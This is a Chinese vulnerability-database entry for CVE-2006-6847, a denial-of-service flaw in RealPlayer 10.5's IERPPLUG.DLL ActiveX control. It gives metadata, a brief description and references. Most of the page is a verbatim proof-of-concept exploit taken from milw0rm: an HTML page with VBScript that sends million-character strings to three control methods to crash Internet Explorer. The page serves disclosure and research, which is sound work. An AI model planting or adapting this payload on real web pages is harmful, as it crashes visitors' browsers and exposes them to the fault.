RealPlayer 'IERPPLUG.DLL' ActiveX控件远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111894 漏洞类型 其他
发布时间 2006-12-28 更新时间 2007-01-03
CVE编号 CVE-2006-6847 CNNVD-ID CNNVD-200612-674
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-674
|漏洞详情
RealPlayer是非常流行的媒体播放器,支持多种格式。IE浏览器在以畸形参数调用RealPlayer的IERPPLUG.DLLActiveX控件时存在漏洞,恶意网站可能利用此漏洞导致用户浏览器崩溃。如果用户受骗打开了恶意的WEB页面的话,就会触发这个漏洞,导致浏览器崩溃。
|漏洞EXP
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------


<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<select style="width: 404px" name="Pucca">
  <option value = "GetComponentVersion">GetComponentVersion</option>
  <option value = "HandleAction">HandleAction</option>
  <option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="GetComponentVersion" then
     argCount   = 1
     arg1=String(1000000, "A")
     RealPlayer.GetComponentVersion arg1
   elseif Pucca.value="HandleAction" then
     argCount   = 1
     arg1=String(1000000, "A")
     RealPlayer.HandleAction arg1
   elseif Pucca.value = "DoAutoUpdateRequest" then
     argCount = 3
     arg1=1
     arg2=String(1000000, "A")
     arg3=1
     RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
   else
     MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
     "The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
     "Their tags shall blink until the end of days."
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2006-12-28]
|参考资料

来源:BID
名称:21802
链接:http://www.securityfocus.com/bid/21802
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/21802.html
来源:XF
名称:realplayer-ierpplug-dos(31141)
链接:http://xforce.iss.net/xforce/xfdb/31141
来源:MILW0RM
名称:3030
链接:http://www.milw0rm.com/exploits/3030
来源:MILW0RM
名称:3030
链接:http://milw0rm.com/exploits/3030
来源:NSFOCUS
名称:9744
链接:http://www.nsfocus.net/vulndb/9744